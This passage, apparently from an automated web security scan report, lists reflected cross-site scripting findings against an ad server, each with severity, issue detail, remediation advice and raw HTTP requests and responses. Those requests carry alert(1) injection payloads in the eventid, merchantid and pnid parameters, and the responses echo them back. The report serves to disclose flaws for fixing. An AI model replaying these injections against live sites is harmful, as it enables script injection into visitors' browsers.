Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:14 GMT
Expires: Fri, 26 Nov 2010 20:47:14 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D4b738'-alert(1)-'0c2a0e4571f&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=http%3a%2f%2fwww.overstock.com">
...[SNIP]...

1.18. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a2c2'-alert(1)-'59698adec3d was submitted in the eventid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=100014a2c2'-alert(1)-'59698adec3d&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:04 GMT
Expires: Fri, 26 Nov 2010 20:47:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=100014a2c2'-alert(1)-'59698adec3d&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D154094
...[SNIP]...

1.19. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93076"-alert(1)-"08bdf57445f was submitted in the eventid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=1000193076"-alert(1)-"08bdf57445f&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:03 GMT
Expires: Fri, 26 Nov 2010 20:47:03 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=1000193076"-alert(1)-"08bdf57445f&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D154094
...[SNIP]...

1.20. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [merchantid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the merchantid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd2"-alert(1)-"20efc82a0ef was submitted in the merchantid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=32500099208ddd2"-alert(1)-"20efc82a0ef&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:05 GMT
Expires: Fri, 26 Nov 2010 20:47:05 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=32500099208ddd2"-alert(1)-"20efc82a0ef&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%2
...[SNIP]...

1.21. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [merchantid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the merchantid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 792de'-alert(1)-'012f9b341 was submitted in the merchantid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920792de'-alert(1)-'012f9b341&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7195
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:06 GMT
Expires: Fri, 26 Nov 2010 20:47:06 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920792de'-alert(1)-'012f9b341&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%2
...[SNIP]...

1.22. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [pnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the pnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dc11"-alert(1)-"d64d46de908 was submitted in the pnid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=05dc11"-alert(1)-"d64d46de908&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:01 GMT
Expires: Fri, 26 Nov 2010 20:47:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=05dc11"-alert(1)-"d64d46de908&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation
...[SNIP]...

1.23. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [pnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the pnid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28f31'-alert(1)-'8c939112a09 was submitted in the pnid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

